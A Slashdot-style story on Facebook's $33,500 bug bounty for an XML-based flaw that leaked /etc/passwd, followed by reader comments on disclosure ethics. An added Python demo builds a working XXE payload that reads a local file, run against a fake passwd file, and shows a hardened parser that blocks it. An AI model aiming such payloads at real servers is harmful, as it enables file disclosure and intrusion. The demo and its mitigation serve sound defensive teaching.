Facebook's Biggest Bounty Yet To Hacker Who Found "Keys To the Kingdom"
mask.of.sanity writes "Facebook has paid out its largest bug bounty of $33,500 for a serious remote code execution vulnerability which also returned Facebook's /etc/passwd. The researcher could change Facebook's use of Gmail as an OpenID provider to a URL he controlled, and then sent a request carrying malicious XML code. The Facebook response included its /etc/passwd, which contained essential login information such as system administrator data and user IDs. The company quickly patched the flaw and awarded him for the proof-of-concept remote code execution, which he quietly disclosed to them."
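The pattern the summary describes, a document fetched from an attacker-controlled OpenID provider URL that carries "malicious XML" and makes the server answer with its own /etc/passwd, is the classic XML external entity (XXE) file-disclosure primitive: a DOCTYPE declares an entity whose SYSTEM identifier is a local path, and a parser that expands external entities inlines the file into the parsed content. The following is an added example, not code from the article or from Facebook; it assumes nothing about Facebook's actual parser and uses Python's stdlib xml.sax, which expanded external general entities by default before Python 3.7.1, against a constructed stand-in for /etc/passwd (it never reads the real file).

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges, property_lexical_handler

# Constructed stand-in for /etc/passwd so the example never touches the real file.
FAKE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
)


class TextCollector(ContentHandler):
    """Collects character data, i.e. what a consumer would read as the provider value."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)

    def text(self):
        return "".join(self.chunks)


class RejectDoctype:
    """Lexical handler that aborts the parse as soon as a DOCTYPE appears.
    An untrusted discovery document has no legitimate need for a DTD, so the
    safest policy is to refuse one outright rather than reason about its entities."""

    def startDTD(self, name, public_id, system_id):
        raise ValueError("DOCTYPE not allowed in untrusted XML (name=%r)" % name)

    def endDTD(self):
        pass

    def startCDATA(self):
        pass

    def endCDATA(self):
        pass

    def comment(self, content):
        pass


def xxe_payload(path):
    """Attacker-controlled document (constructed) as a hostile provider would serve it.
    The entity's SYSTEM identifier is a local file path on the victim server; an
    entity-expanding parser substitutes the file's contents for &xxe;."""
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE openid [<!ENTITY xxe SYSTEM "%s">]>\n'
        '<openid><provider>&xxe;</provider></openid>\n' % path
    ).encode()


def parse_vulnerable(xml_bytes):
    """Parser that resolves external general entities: the pre-3.7.1 xml.sax default."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, True)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return collector.text()


def parse_hardened(xml_bytes):
    """Same parse with external entities disabled and any DOCTYPE rejected."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, False)
    parser.setProperty(property_lexical_handler, RejectDoctype())
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return collector.text()


def run_demo():
    """Writes the fake passwd file, runs both parsers on the payload, returns the outcomes."""
    fd, path = tempfile.mkstemp(prefix="fake-passwd-")
    with os.fdopen(fd, "w") as f:
        f.write(FAKE_PASSWD)
    try:
        leaked = parse_vulnerable(xxe_payload(path))      # file contents come back as text
        try:
            parse_hardened(xxe_payload(path))
            blocked = None
        except ValueError as exc:                          # DOCTYPE refused before any entity
            blocked = str(exc)
    finally:
        os.remove(path)
    # A benign document (hypothetical provider URL) still parses normally.
    benign = parse_hardened(
        b"<openid><provider>https://openid.example.net/id</provider></openid>"
    )
    return {"leaked": leaked, "blocked": blocked, "benign": benign}


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, "->", repr(value))
```

The first parser hands the attacker the file verbatim, which is exactly the "response included /etc/passwd" symptom in the summary; the same entity could equally name any other readable config file or an internal URL. The hardened path does two independent things: it leaves external entity expansion off (the stdlib default since 3.7.1, but worth setting explicitly because older runtimes and lxml differ) and it refuses a DOCTYPE altogether, which also shuts down parameter-entity and billion-laughs variants that the first switch alone does not.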
Stingy reward. That would have fetched quite a bit more on the black/open market.
Yes, but now he's got a couple of white hat security firms considering offering him more than whatever he's making now, without the risk of jail time to boot.
Occasionally living proof of the Ballmer peak.
Nice to associate the term "hacker" with "honest" once in a while
It's a demonstration of a file system traversal vulnerability. Most likely the application runs under an unprivileged user account which surely does not have access rights to read /etc/shadow; however, it has access to its own configuration files, which may reveal much more information than the hashes of root's password. And if Facebook admins have some clue, then their own user accounts are not even on the system but on a central authentication server along with the passwords. Anyway, the content of /etc/passwd is more than enough for the demonstration.
$33,500? He probably could have gotten WAY more on the black market. This is ultimately the problem with stingy bug bounties.
How is it a problem?
It's a fact of life that we are daily confronted with the choice between doing the right thing and screwing someone over for money.
My neighbor went on vacation, they gave me the keys to the house to water the plants, and bring in her mail. I could turn a tidy profit passing the information that the house is empty to a ring of thieves, steal her identity, and strip her car.
Or I can just water the plants and usually receive a bottle of wine or other small thank you gift.
I had the 'keys to her kingdom', and she repaid my responsible behaviour with a token. Should I complain she's being stingy, and call it a huge problem too?
This. Not everyone worth their salt in security sees financial gain as the sole objective, or there would be no honest work left in the world. Would the GP recommend to a factory worker that if he just stole 10 of the devices on the conveyor a day, or drove the forklift full of pallets to his house, he could make his yearly wage in a week? If you work on the wrong side of the law (in this case, the laws being entirely ethical, as so much is at stake), you are not guaranteed to not get caught, nor are you guaranteed a working wage after finding and selling a flaw. Jail time and honest work in this case are the carrot and stick deciding how finding the exploit is to the benefit of the discoverer.
Emacs: for people who just never know when to